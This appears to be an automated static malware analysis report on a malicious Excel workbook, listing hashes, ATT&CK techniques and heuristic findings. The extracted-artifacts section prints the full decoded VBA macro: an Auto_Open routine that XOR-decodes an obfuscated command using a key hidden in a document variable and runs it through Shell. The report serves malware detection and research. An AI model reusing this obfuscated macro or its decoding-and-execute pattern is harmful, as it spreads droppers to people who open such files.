Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 2cf218d8c2ed9129…

MALICIOUS

Office (OOXML)

1.38 MB Created: 2020-06-12 20:59:23 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-07-10
MD5: ba95d53554e901a5b62b7c4a5816771a SHA-1: dea071d25eebcaf16a4ab7ceea4040abc5652974 SHA-256: 2cf218d8c2ed9129334789bfc0b5277e8616242e00c0006183940d10711ca9ab
138 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is an Excel document containing VBA macros, including an Auto_Open macro that utilizes the Shell() function. This indicates an attempt to execute arbitrary code. The presence of obfuscated VBA code and the extraction of macro-related files suggest a downloader or dropper functionality. The document body, while appearing benign, is likely a lure to encourage user interaction with the malicious add-in.

Heuristics 6

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    ((59 Xor 114) + (19 Xor 13)), ((135 Xor 17) + (16 Xor 3)), ((1 Xor 10) + (50 Xor 231)), (4 + 149), (135 Xor 16), ((10 Xor 4) + 13), ((19 Xor 56) + 70), 132, (24 + (77 Xor 16)), 24, 200, ((4 Xor 0) + 31), (70 Xor 1), ((3 Xor 15) + 3), ((35 Xor 11) + (37 Xor 11)), (15 + 24), 154, (77 + (26 Xor 104)), (96 + (8 Xor 4)), 81, (3 + (4 Xor 15)), 162, (99 + (7 Xor 16)), ((23 Xor 9) + 168), (31 Xor 37), (12 Xor 31), (216 Xor 1)), (82 Xor 142)) + ZIfQhhZQoDxRIH + pBzimzueIFlz(Array((18 Xor 15)), ((236 Xor  …
    Shell zGBJPPSjXi, 1
    MsgBox (zGBJPPSjXi)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Private mpXdQOsHozQ((0 Xor 0) To 127) As Byte
    Sub auto_open()
    Dim xoioTLJARSTlIT As String
  • Hidden worksheet (hidden) low OOXML_HIDDEN_SHEET
    Excel workbook contains 3 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 12604 bytes
SHA-256: dddc9f2b2ccb70a9652a32f494130b3d872e20215d114f85f1d131889f5fa689
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
"Use this line to add the document variable to you file and then remove these comments."
ActiveDocument.Variables.Add Name:="cAXlWbmgxhemFgPV", Value:="jCA4FlvJkR+ZBxjP7O+fTqe748em3jiIbARtoYZ2OjVWTgdBX5VNPO17nwDp6sseVZKmFY8A474IWWQC3pzNGaz2qALGtxrg+HWHtUfGcf/Lrfers45F+5i8EYpR82Ios3nwjIDzCGgAX0QnWFzgLU1Zh5zCmxeulY13jP8DFuIg8Rff3ZyhBFkKJpHbqaY1XW0nAetwd4+YIabB2QhRayGmsrKThrKhuwSI+acUj+ouzBU/OwtX4+SwYK649j0LFAAsay0S+6bFRPDlFpDt0cV2SRhvoezOZqNRXqgdZWNL+D6wgNYeiaLg53oC11U1pkw3fTlB89MJcSPEE6pfM/46"
Private gqRlbLvysEqmz       As Boolean
Private MEOLbTXFZPSM((0 + 0) To 63) As Byte
Private mpXdQOsHozQ((0 Xor 0) To 127) As Byte
Sub auto_open()
Dim xoioTLJARSTlIT As String
Dim zGBJPPSjXi As String
xoioTLJARSTlIT = pBzimzueIFlz(Array(((1 Xor 194) + 33), (83 + (1 Xor 0)), (76 + (0 Xor 0)), (29 Xor 123), (5 + 35), 243, ((46 Xor 116) + (85 Xor 49)), ((3 Xor 51) + (0 Xor 0)), ((65 Xor 11) + 167), 110, ((11 Xor 114) + 6), (86 + 84), (116 Xor 253), 193, 241, (35 Xor 8), 211, (125 Xor 233), ((53 Xor 118) + 63), ((31 Xor 60) + (31 Xor 157)), (151 Xor 82), ((49 Xor 92) + 132), (81 Xor 0)), 0) & pBzimzueIFlz(Array((214 Xor 48), ((8 Xor 0) + (0 Xor 0)), (33 + 64), (19 + (0 Xor 2)), ((12 Xor 3) + 128), (87 Xor 161), 5, 11), 23)
Dim ZIfQhhZQoDxRIH As String
ZIfQhhZQoDxRIH = pBzimzueIFlz(Array(((21 Xor 120) + (3 Xor 10)), 108, 18, 82, (48 + (0 Xor 2)), (37 Xor 31)), ((1 Xor 20) + 10)) & pBzimzueIFlz(Array((195 Xor 36), ((4 Xor 8) + 50), (18 + 78), (148 + 3), (14 Xor 20), (184 + (17 Xor 47)), (59 + (21 Xor 50)), 136, ((140 Xor 30) + 36), ((12 Xor 25) + 141), ((26 Xor 123) + 15), (6 Xor 55), (129 Xor 118), (209 + 13), (57 Xor 2), 255, 115, (172 + (13 Xor 43))), ((17 Xor 13) + (9 Xor 0)))
zGBJPPSjXi = pBzimzueIFlz(Array((69 Xor 152), ((20 Xor 40) + (23 Xor 62)), 61, (0 Xor 68), (16 Xor 61), 181, 188, (189 + (0 Xor 0)), ((70 Xor 21) + (35 Xor 0)), 219, ((59 Xor 123) + 83), (76 Xor 150), (110 + (1 Xor 2)), 174, ((19 Xor 59) + (127 Xor 213)), (23 + 95), (40 + 100), (128 Xor 88), 88, ((44 Xor 160) + (13 Xor 73)), (187 + (6 Xor 39)), (31 Xor 54), (77 Xor 239), ((12 Xor 21) + 5), (75 + 61), 152, (202 Xor 19), (121 Xor 247), ((8 Xor 1) + (186 Xor 4)), (153 Xor 79), (28 + 146), 43, ((3 Xor 39) + (39 Xor 87)), ((72 Xor 232) + 74), 209, (91 + 21), _
(2 + (121 Xor 157)), (9 + (98 Xor 10)), ((5 Xor 9) + (47 Xor 253)), ((8 Xor 23) + 8), (70 + 10), (88 Xor 142), 26, 133, (112 Xor 136), ((83 Xor 193) + (44 Xor 123)), 156, 102, (44 Xor 20), ((33 Xor 9) + 71), (20 Xor 39), (36 + 9), ((13 Xor 24) + 47), (19 + (9 Xor 7)), (96 Xor 28), ((2 Xor 45) + (58 Xor 73)), (20 Xor 64), ((19 Xor 33) + 11), 56, ((109 Xor 196) + (66 Xor 9)), (50 + 157), (25 + 201), ((20 Xor 91) + 103), (25 Xor 96), 193, 229, (115 Xor 140), (13 Xor 21), ((5 Xor 3) + (60 Xor 216)), (92 + 58)), (55 + (0 Xor 0))) & pBzimzueIFlz(Array((44 + 67), _
((74 Xor 17) + 24), (28 Xor 222), ((0 Xor 0) + 8), (86 Xor 233), ((35 Xor 124) + (3 Xor 16)), (60 + (96 Xor 12)), (96 + 144), (176 Xor 99), ((110 Xor 193) + (15 Xor 27)), (86 Xor 56), (34 + 26), (25 Xor 112), ((12 Xor 63) + (5 Xor 26)), (20 Xor 165), (37 Xor 173), (166 + 42), (152 Xor 77), (19 Xor 82), (25 Xor 33), (0 + (0 Xor 0)), (0 + 9), (53 + 26), (76 Xor 194), ((3 Xor 7) + 0), 89, (83 + 133), 253, ((21 Xor 87) + 1), 229, ((92 Xor 3) + 78), (109 + 67), (89 + (5 Xor 17)), 63, (30 + 1), (6 + (2 Xor 0)), ((103 Xor 28) + 13), 246, (152 Xor 69), ((18 Xor 124) + (98 Xor 20)), _
((4 Xor 1) + 227), (125 Xor 163), (92 Xor 146), (102 + (28 Xor 104)), ((31 Xor 35) + 36), (166 Xor 104), (5 + (135 Xor 12)), ((21 Xor 12) + (88 Xor 234)), 113, ((70 Xor 49) + (2 Xor 50)), 205), ((57 Xor 120) + 60)) + xoioTLJARSTlIT + pBzimzueIFlz(Array((4 + (2 Xor 7)), ((24 Xor 171) + 45), (36 Xor 17), (1 + (18 Xor 5))), (63 + 113)) + ZIfQhhZQoDxRIH + pBzimzueIFlz(Array((21 Xor 9), ((3 Xor 13) + (12 Xor 24)), 108, ((2 Xor 0) + 193), 148, ((9 Xor 100) + 114), (14 Xor 25), 203, (170 + 32), (88 Xor 221), ((27 Xor 44) + 30), 110, ((40 Xor 108) + (7 Xor 51)), _
(78 Xor 34), 12, (36 + (16 Xor 50)), (50 Xor 72), 123, ((59 Xor 87) + 41), (44 + 150), ((101 Xor 227) + 36), ((9 Xor 0) + (1 Xor 43)), (26 + 137), (73 Xor 216), 111, 252, ((38 Xor 75) + 27), (7 + 234), ((3 Xor 6) + 166), (14 + 11), 59, 117, ((3 Xor 10) + (5 Xor 0)), (113 Xor 188), ((68 Xor 1) + 135), (187 + (29 Xor 53)), (5 + (1 Xor 31)), ((0 Xor 2) + (42 Xor 243)), 52, ((27 Xor 5) + 31)), (76 + 104)) & pBzimzueIFlz(Array((87 + (108 Xor 234)), (24 + 81), (0 Xor 12), ((4 Xor 3) + (0 Xor 5)), ((0 Xor 5) + 32), 168, (45 Xor 124), ((41 Xor 4) + 175), 233, (24 + (125 Xor 224)), _
((59 Xor 114) + (19 Xor 13)), ((135 Xor 17) + (16 Xor 3)), ((1 Xor 10) + (50 Xor 231)), (4 + 149), (135 Xor 16), ((10 Xor 4) + 13), ((19 Xor 56) + 70), 132, (24 + (77 Xor 16)), 24, 200, ((4 Xor 0) + 31), (70 Xor 1), ((3 Xor 15) + 3), ((35 Xor 11) + (37 Xor 11)), (15 + 24), 154, (77 + (26 Xor 104)), (96 + (8 Xor 4)), 81, (3 + (4 Xor 15)), 162, (99 + (7 Xor 16)), ((23 Xor 9) + 168), (31 Xor 37), (12 Xor 31), (216 Xor 1)), (82 Xor 142)) + ZIfQhhZQoDxRIH + pBzimzueIFlz(Array((18 Xor 15)), ((236 Xor 20) + (0 Xor 9)))
Shell zGBJPPSjXi, 1
MsgBox (zGBJPPSjXi)
End Sub
Public Function RPzufDpdLuZ(ByVal xpCsaERmJmtwnI As String) As Byte()
If Not gqRlbLvysEqmz Then uYDHRsaHLfVLwz
Dim KVfaohzuxq() As Byte: KVfaohzuxq = FMFiavfWkO(xpCsaERmJmtwnI)
Dim KddmJDRPMvp As Long: KddmJDRPMvp = UBound(KVfaohzuxq) + ((0 Xor 0) + 1)
If KddmJDRPMvp Mod (0 Xor 4) <> ((0 Xor 0) + (0 Xor 0)) Then Err.Raise vbObjectError, , ""
Do While KddmJDRPMvp > ((0 Xor 0) + 0)
If KVfaohzuxq(KddmJDRPMvp - 1) <> Asc("=") Then Exit Do
KddmJDRPMvp = KddmJDRPMvp - (1 Xor 0)
Loop
Dim IZgjIsManlh As Long: IZgjIsManlh = (KddmJDRPMvp * (1 + (2 Xor 0))) \ (2 + 2)
Dim lOyLMtkKpya() As Byte
ReDim lOyLMtkKpya(((0 Xor 0) + 0) To IZgjIsManlh - 1) As Byte
Dim WqczwdFUDQC As Long
Dim TerVODndEi As Long
Do While WqczwdFUDQC < KddmJDRPMvp
Dim VTMlKtKUmdV As Byte: VTMlKtKUmdV = KVfaohzuxq(WqczwdFUDQC): WqczwdFUDQC = WqczwdFUDQC + (0 Xor 1)
Dim uoYRzGbRfBufO As Byte: uoYRzGbRfBufO = KVfaohzuxq(WqczwdFUDQC): WqczwdFUDQC = WqczwdFUDQC + (1 Xor 0)
Dim bQwdInPOntCVY As Byte: If WqczwdFUDQC < KddmJDRPMvp Then bQwdInPOntCVY = KVfaohzuxq(WqczwdFUDQC): WqczwdFUDQC = WqczwdFUDQC + 1 Else bQwdInPOntCVY = Asc("A")
Dim dUKoeyhUzEBq As Byte: If WqczwdFUDQC < KddmJDRPMvp Then dUKoeyhUzEBq = KVfaohzuxq(WqczwdFUDQC): WqczwdFUDQC = WqczwdFUDQC + ((0 Xor 0) + (1 Xor 0)) Else dUKoeyhUzEBq = Asc("A")
If VTMlKtKUmdV > (90 + 37) Or uoYRzGbRfBufO > (40 Xor 87) Or bQwdInPOntCVY > (24 Xor 103) Or dUKoeyhUzEBq > 127 Then _
Err.Raise vbObjectError, , ""
Dim SzcsydJXlO As Byte: SzcsydJXlO = mpXdQOsHozQ(VTMlKtKUmdV)
Dim HtOoBeWkUpFaL As Byte: HtOoBeWkUpFaL = mpXdQOsHozQ(uoYRzGbRfBufO)
Dim ZKFXlNixrXoJR As Byte: ZKFXlNixrXoJR = mpXdQOsHozQ(bQwdInPOntCVY)
Dim MCijTyLTnqo As Byte: MCijTyLTnqo = mpXdQOsHozQ(dUKoeyhUzEBq)
If SzcsydJXlO > ((10 Xor 52) + (1 Xor 0)) Or HtOoBeWkUpFaL > (7 Xor 56) Or ZKFXlNixrXoJR > (23 Xor 40) Or MCijTyLTnqo > ((14 Xor 30) + 47) Then _
Err.Raise vbObjectError, , ""
Dim XnxxAjPpSI As Byte: XnxxAjPpSI = (SzcsydJXlO * (0 + 4)) Or (HtOoBeWkUpFaL \ &H10)
Dim UWiIjKvIfCaza As Byte: UWiIjKvIfCaza = ((HtOoBeWkUpFaL And &HF) * &H10) Or (ZKFXlNixrXoJR \ ((1 Xor 5) + (0 Xor 0)))
Dim TFtaTbxzMnQR As Byte: TFtaTbxzMnQR = ((ZKFXlNixrXoJR And (0 Xor 3)) * &H40) Or MCijTyLTnqo
lOyLMtkKpya(TerVODndEi) = XnxxAjPpSI: TerVODndEi = TerVODndEi + (1 + (0 Xor 0))
If TerVODndEi < IZgjIsManlh Then lOyLMtkKpya(TerVODndEi) = UWiIjKvIfCaza: TerVODndEi = TerVODndEi + (1 + 0)
If TerVODndEi < IZgjIsManlh Then lOyLMtkKpya(TerVODndEi) = TFtaTbxzMnQR: TerVODndEi = TerVODndEi + (0 Xor 1)
Loop
RPzufDpdLuZ = lOyLMtkKpya
End Function
Private Sub uYDHRsaHLfVLwz()
Dim mtsmAhDpAIj As Integer, AHlVJicJXTxrC As Integer
AHlVJicJXTxrC = (0 + 0)
For mtsmAhDpAIj = Asc("A") To Asc("Z"): MEOLbTXFZPSM(AHlVJicJXTxrC) = mtsmAhDpAIj: AHlVJicJXTxrC = AHlVJicJXTxrC + (0 Xor 1): Next
For mtsmAhDpAIj = Asc("a") To Asc("z"): MEOLbTXFZPSM(AHlVJicJXTxrC) = mtsmAhDpAIj: AHlVJicJXTxrC = AHlVJicJXTxrC + 1: Next
For mtsmAhDpAIj = Asc("0") To Asc("9"): MEOLbTXFZPSM(AHlVJicJXTxrC) = mtsmAhDpAIj: AHlVJicJXTxrC = AHlVJicJXTxrC + 1: Next
MEOLbTXFZPSM(AHlVJicJXTxrC) = Asc("+"): AHlVJicJXTxrC = AHlVJicJXTxrC + ((0 Xor 0) + 1)
MEOLbTXFZPSM(AHlVJicJXTxrC) = Asc("/"): AHlVJicJXTxrC = AHlVJicJXTxrC + ((0 Xor 0) + (0 Xor 1))
For AHlVJicJXTxrC = ((0 Xor 0) + 0) To 127: mpXdQOsHozQ(AHlVJicJXTxrC) = (216 Xor 39): Next
For AHlVJicJXTxrC = (0 Xor 0) To (25 Xor 38): mpXdQOsHozQ(MEOLbTXFZPSM(AHlVJicJXTxrC)) = AHlVJicJXTxrC: Next
gqRlbLvysEqmz = True
End Sub
Private Function FMFiavfWkO(ByVal xpCsaERmJmtwnI As String) As Byte()
Dim HtOoBeWkUpFaL() As Byte: HtOoBeWkUpFaL = xpCsaERmJmtwnI
Dim BfLvKxTqutd As Long: BfLvKxTqutd = (UBound(HtOoBeWkUpFaL) + (1 + 0)) \ ((0 Xor 2) + (0 Xor 0))
If BfLvKxTqutd = (0 + 0) Then FMFiavfWkO = HtOoBeWkUpFaL: Exit Function
Dim ZKFXlNixrXoJR() As Byte
ReDim ZKFXlNixrXoJR((0 + (0 Xor 0)) To BfLvKxTqutd - (1 + 0)) As Byte
Dim ZdQBGQbGaAdm As Long
For ZdQBGQbGaAdm = ((0 Xor 0) + (0 Xor 0)) To BfLvKxTqutd - (0 + (0 Xor 1))
Dim mtsmAhDpAIj As Long: mtsmAhDpAIj = HtOoBeWkUpFaL(2 * ZdQBGQbGaAdm) + (193 Xor 449) * CLng(HtOoBeWkUpFaL((1 Xor 3) * ZdQBGQbGaAdm + ((0 Xor 0) + (0 Xor 1))))
If mtsmAhDpAIj >= (99 Xor 355) Then mtsmAhDpAIj = Asc("?")
ZKFXlNixrXoJR(ZdQBGQbGaAdm) = mtsmAhDpAIj
Next
FMFiavfWkO = ZKFXlNixrXoJR
End Function
Private Function pBzimzueIFlz(CMYwxKsJCjVmJ As Variant, tRZITegTRXXXz As Integer)
Dim YuCDMOfyUe As String
Dim lzZPDCAOjO() As Byte
lzZPDCAOjO = RPzufDpdLuZ(ActiveDocument.Variables("cAXlWbmgxhemFgPV"))
YuCDMOfyUe = ""
For AHlVJicJXTxrC = LBound(CMYwxKsJCjVmJ) To UBound(CMYwxKsJCjVmJ)
YuCDMOfyUe = YuCDMOfyUe & Chr(lzZPDCAOjO(AHlVJicJXTxrC + tRZITegTRXXXz) Xor CMYwxKsJCjVmJ(AHlVJicJXTxrC))
Next
pBzimzueIFlz = YuCDMOfyUe
End Function



Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet7"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet8"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 36864 bytes
SHA-256: 098e78540d1af5c57f98dd84cebffd6efb7030ceccd89a4c4f3f177c61d506c0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).